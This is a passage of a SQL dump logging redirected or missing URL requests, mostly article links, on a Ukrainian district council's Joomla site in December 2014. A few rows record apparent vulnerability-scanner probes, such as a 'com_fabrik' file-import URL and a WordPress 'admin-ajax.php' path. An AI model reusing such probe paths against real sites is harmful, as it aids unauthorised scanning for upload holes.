00:00:00',301),(11775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:39:27','0000-00-00 00:00:00',301),(11776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:39:29','0000-00-00 00:00:00',301),(11777,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:39:32','0000-00-00 00:00:00',301),(11778,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:39:35','0000-00-00 00:00:00',301),(11779,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:39:43','0000-00-00 00:00:00',301),(11780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:39:46','0000-00-00 00:00:00',301),(11781,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:40:03','0000-00-00 00:00:00',301),(11782,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:40:06','0000-00-00 00:00:00',301),(11783,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:40:10','0000-00-00 00:00:00',301),(11784,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:40:13','0000-00-00 00:00:00',301),(11785,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-12-04 21:40:22','0000-00-00 00:00:00',301),(11786,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-04 21:51:02','0000-00-00 00:00:00',301),(11787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:51:10','0000-00-00 00:00:00',301),(11788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:51:13','0000-00-00 00:00:00',301),(11789,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:51:15','0000-00-00 00:00:00',301),(11790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-04 21:51:23','0000-00-00 00:00:00',301),(11791,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:51:26','0000-00-00 00:00:00',301),(11792,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:51:28','0000-00-00 00:00:00',301),(11793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:51:31','0000-00-00 00:00:00',301),(11794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:51:34','0000-00-00 00:00:00',301),(11795,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:51:36','0000-00-00 00:00:00',301),(11796,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:51:39','0000-00-00 00:00:00',301),(11797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-12-04 21:52:00','0000-00-00 00:00:00',301),(11798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-04 21:52:03','0000-00-00 00:00:00',301),(11799,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:52:14','0000-00-00 00:00:00',301),(11800,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:52:49','0000-00-00 00:00:00',301),(11801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:52:51','0000-00-00 00:00:00',301),(11802,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:52:56','0000-00-00 00:00:00',301),(11803,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:52:59','0000-00-00 00:00:00',301),(11804,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=en&Itemid=0','','','',3,0,'2014-12-04 21:53:02','0000-00-00 00:00:00',301),(11805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:53:04','0000-00-00 00:00:00',301),(11806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:53:07','0000-00-00 00:00:00',301),(11807,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:53:10','0000-00-00 00:00:00',301),(11808,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:53:12','0000-00-00 00:00:00',301),(11809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:53:15','0000-00-00 00:00:00',301),(11810,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:53:17','0000-00-00 00:00:00',301),(11811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-12-04 21:53:20','0000-00-00 00:00:00',301),(11812,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-04 21:53:22','0000-00-00 00:00:00',301),(11813,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en&Itemid=0','','','',2,0,'2014-12-04 21:53:25','0000-00-00 00:00:00',301),(11814,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=uk','','','',2,0,'2014-12-04 21:53:32','0000-00-00 00:00:00',301),(11815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-12-04 21:54:29','0000-00-00 00:00:00',301),(11816,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-12-04 22:01:34','0000-00-00 00:00:00',301),(11817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&catid=49:--12042013-&Itemid=88&lang=ru','','','',2,0,'2014-12-04 22:01:52','0000-00-00 00:00:00',301),(11818,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',2,0,'2014-12-04 22:02:06','0000-00-00 00:00:00',301),(11819,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1033:2013-06-18-12-58-36&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 22:19:45','0000-00-00 00:00:00',301),(11820,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1140:80-1932-33-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-04 22:20:57','0000-00-00 00:00:00',301),(11821,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1104:-lr&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 22:20:59','0000-00-00 00:00:00',301),(11822,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1003:1&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 23:53:55','0000-00-00 00:00:00',301),(11823,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=930:2013-02-21-09-13-00&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-04 23:54:14','0000-00-00 00:00:00',301),(11824,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1204:2014-01-31-07-51-23&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-04 23:54:16','0000-00-00 00:00:00',301),(11825,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-04 23:54:54','0000-00-00 00:00:00',301),(11826,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1128:2013-11-06-13-04-56&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-05 01:28:38','0000-00-00 00:00:00',301),(11827,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1031:2013-06-17-06-49-26&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-05 01:28:41','0000-00-00 00:00:00',301),(11828,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1258:2014-03-31-06-18-35&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-05 01:28:43','0000-00-00 00:00:00',301),(11829,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1197:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-05 04:42:02','0000-00-00 00:00:00',301),(11830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:--21022013-&Itemid=86&lang=ru','','','',4,0,'2014-12-05 07:09:27','0000-00-00 00:00:00',301),(11831,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-12-05 07:35:40','0000-00-00 00:00:00',301),(11832,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1155:2013-12-07-15-56-12&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?fm=1&rf=9516&q=%D1%82%D0%B5%D0%BA%D1%81%D1%82+%D0%BF%D0%BE%D0%B4%D1%8F%D0%BA%D0%B8+%D0%B4%D0%BE+%D0%B4%D0%BD%D1%8F+%D1%81%D0%','',2,0,'2014-12-05 07:59:48','0000-00-00 00:00:00',301),(11833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-12-05 08:20:17','0000-00-00 00:00:00',301),(11834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1105:2013-10-11-16-43-25&catid=11&lang=uk&Itemid=','','','',2,0,'2014-12-05 08:20:52','0000-00-00 00:00:00',301),(11835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-12-05 08:21:39','0000-00-00 00:00:00',301),(11836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-12-05 08:21:49','0000-00-00 00:00:00',301),(11837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-12-05 08:23:00','0000-00-00 00:00:00',301),(11838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1173:2014-01-15-10-37-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-05 09:25:25','0000-00-00 00:00:00',301),(11839,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/944-os-chomu-ukrajina-peremozhe','','','',10,0,'2014-12-05 13:47:18','0000-00-00 00:00:00',301),(11840,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1233:2014-03-03-10-28-35&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-05 14:10:01','0000-00-00 00:00:00',301),(11841,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1033:2013-06-18-12-58-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-05 14:10:04','0000-00-00 00:00:00',301),(11842,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=976:2013-03-21-18-42-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-05 18:54:29','0000-00-00 00:00:00',301),(11843,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1204:2014-01-31-07-51-23&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-05 20:29:21','0000-00-00 00:00:00',301),(11844,'http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php','','','',20,0,'2014-12-05 21:16:56','0000-00-00 00:00:00',301),(11845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1218:2014-02-21-15-02-18&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-05 22:04:58','0000-00-00 00:00:00',301),(11846,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&lang=ru&option=com_content&view=article','','','',9,0,'2014-12-05 22:20:26','0000-00-00 00:00:00',301),(11847,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1081:-2013-2017-&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-05 23:56:11','0000-00-00 00:00:00',301),(11848,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1270:2014-04-08-13-49-40&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 01:14:43','0000-00-00 00:00:00',301),(11849,'http://www.malyn-rayrada.org.ua/index.php?Itemid=108&catid=60:--11072014-&id=1364:-2012-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-06 01:31:56','0000-00-00 00:00:00',301),(11850,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1157:-11-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 02:49:34','0000-00-00 00:00:00',301),(11851,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1252:2014-03-24-17-19-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-06 03:08:12','0000-00-00 00:00:00',301),(11852,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1064:2013-08-09-07-52-21&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-06 04:24:09','0000-00-00 00:00:00',301),(11853,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-12-06 06:26:02','0000-00-00 00:00:00',301),(11854,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=984:-20-&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-06 07:01:59','0000-00-00 00:00:00',301),(11855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-12-06 07:22:22','0000-00-00 00:00:00',301),(11856,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1225:2014-02-24-13-27-21&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-06 07:33:44','0000-00-00 00:00:00',301),(11857,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-06 07:57:05','0000-00-00 00:00:00',301),(11858,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1012:l-r&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-06 10:43:14','0000-00-00 00:00:00',301),(11859,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-06 11:42:40','0000-00-00 00:00:00',301),(11860,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1371:2014-08-04-19-11-42&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 13:52:56','0000-00-00 00:00:00',301),(11861,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1080:---------------l-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-06 15:27:46','0000-00-00 00:00:00',301),(11862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1356:2014-07-03-06-32-02&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-06 16:23:31','0000-00-00 00:00:00',301),(11863,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/---1932-33-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/---1932-33-/141-mi-pam-jataemo','',2,0,'2014-12-06 16:54:52','0000-00-00 00:00:00',301),(11864,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1341:-----------------14052014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-06 17:02:43','0000-00-00 00:00:00',301),(11865,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1247:2014-03-20-14-37-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-06 17:02:45','0000-00-00 00:00:00',301),(11866,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1134:-25-6-&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-06 17:02:50','0000-00-00 00:00:00',301),(11867,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1164:2013-12-29-11-46-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 17:57:27','0000-00-00 00:00:00',301),(11868,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1124:2013-10-30-08-05-10&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1124:2013-10-30-08-05-10&lang=uk&layout=default&page&print=1&tmpl=component&','',3,0,'2014-12-06 18:36:38','0000-00-00 00:00:00',301),(11869,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&lang=ru&option=com_content&view=article','','','',7,0,'2014-12-06 18:37:30','0000-00-00 00:00:00',301),(11870,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=944:-l-r-&lang=ru&option=com_content&view=article','','','',5,0,'2014-12-06 18:37:33','0000-00-00 00:00:00',301),(11871,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1276:2014-04-10-13-26-15&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-06 19:31:49','0000-00-00 00:00:00',301),(11872,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1294:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 20:45:16','0000-00-00 00:00:00',301),(11873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1211:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-06 21:47:25','0000-00-00 00:00:00',301),(11874,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1166:2014-01-06-08-21-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-06 22:22:09','0000-00-00 00:00:00',301),(11875,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1284:2014-04-17-13-00-18&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-06 22:39:45','0000-00-00 00:00:00',301),(11876,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-06 23:20:12','0000-00-00 00:00:00',301),(11877,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1047:2013-07-10-05-51-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-07 00:13:08','0000-00-00 00:00:00',301),(11878,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1316:2014-05-20-12-49-29&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-07 01:46:40','0000-00-00 00:00:00',301),(11879,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1041:2013-07-02-13-55-38&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-07 01:46:49','0000-00-00 00:00:00',301),(11880,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1331:2014-06-04-07-15-27&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-07 02:31:40','0000-00-00 00:00:00',301),(11881,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1224:----25--2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-07 03:09:14','0000-00-00 00:00:00',301),(11882,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1026:2013-06-14-05-02-34&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-07 03:20:01','0000-00-00 00:00:00',301),(11883,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1182:2014-01-23-06-45-09&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-07 08:00:38','0000-00-00 00:00:00',301),(11884,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1187:2014-01-28-09-43-51&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-07 08:00:40','0000-00-00 00:00:00',301),(11885,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1228:2014-02-27-14-42-41&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-07 08:45:02','0000-00-00 00:00:00',301),(11886,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1011:2013-05-29-09-51-28&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-07 09:34:14','0000-00-00 00:00:00',301),(11887,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1063:2013-08-02-17-32-04&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-07 09:34:20','0000-00-00 00:00:00',301),(11888,'http://www.malyn-rayrada.org.ua/information/components/com_community/index.html','','','',1,0,'2014-12-07 11:33:01','0000-00-00 00:00:00',301),(11889,'http://www.malyn-rayrada.org.ua/information/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-12-07 11:33:03','0000-00-00 00:00:00',301),(11890,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=971:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-07 12:41:01','0000-00-00 00:00:00',301),(11891,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1138:-15112013&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-07 12:41:15','0000-00-00 00:00:00',301),(11892,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1227:2014-02-25-07-36-58&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-07 14:14:35','0000-00-00 00:00:00',301),(11893,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1135:2013-11-15-07-00-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-07 14:14:47','0000-00-00 00:00:00',301),(11894,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1286:2014-04-23-06-48-27&lang=ru&option=com_content&view=article','','','',5,0,'2014-12-07 17:21:28','0000-00-00 00:00:00',301),(11895,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1017:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-07 21:09:23','0000-00-00 00:00:00',301),(11896,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=959:2013-03-11-06-19-41&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-07 22:02:03','0000-00-00 00:00:00',301),(11897,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1093:-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-07 22:42:11','0000-00-00 00:00:00',301),(11898,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1210:2014-02-03-13-20-51&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-08 02:42:20','0000-00-00 00:00:00',301),(11899,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1153:-2013-&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-08 02:42:22','0000-00-00 00:00:00',301),(11900,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1256:2014-03-27-17-22-43&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-08 02:42:24','0000-00-00 00:00:00',301),(11901,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&lang=en&option=com_content&view=article','','','',2,0,'2014-12-08 03:22:06','0000-00-00 00:00:00',301),(11902,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1085:2013-09-11-12-15-54&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-08 04:15:41','0000-00-00 00:00:00',301),(11903,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1053:2013-07-19-11-34-22&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-08 05:49:20','0000-00-00 00:00:00',301),(11904,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=964:----------------------2013-2017-&lang=uk&option=com_content&view=article','','','',5,0,'2014-12-08 07:23:14','0000-00-00 00:00:00',301),(11905,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1235:2014-03-06-13-25-26&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-08 08:56:46','0000-00-00 00:00:00',301),(11906,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1001:2013-04-30-12-14-17&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-08 12:06:36','0000-00-00 00:00:00',301),(11907,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=en','','','',1,0,'2014-12-08 13:01:50','0000-00-00 00:00:00',301),(11908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-12-08 13:02:17','0000-00-00 00:00:00',301),(11909,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',2,0,'2014-12-08 13:02:19','0000-00-00 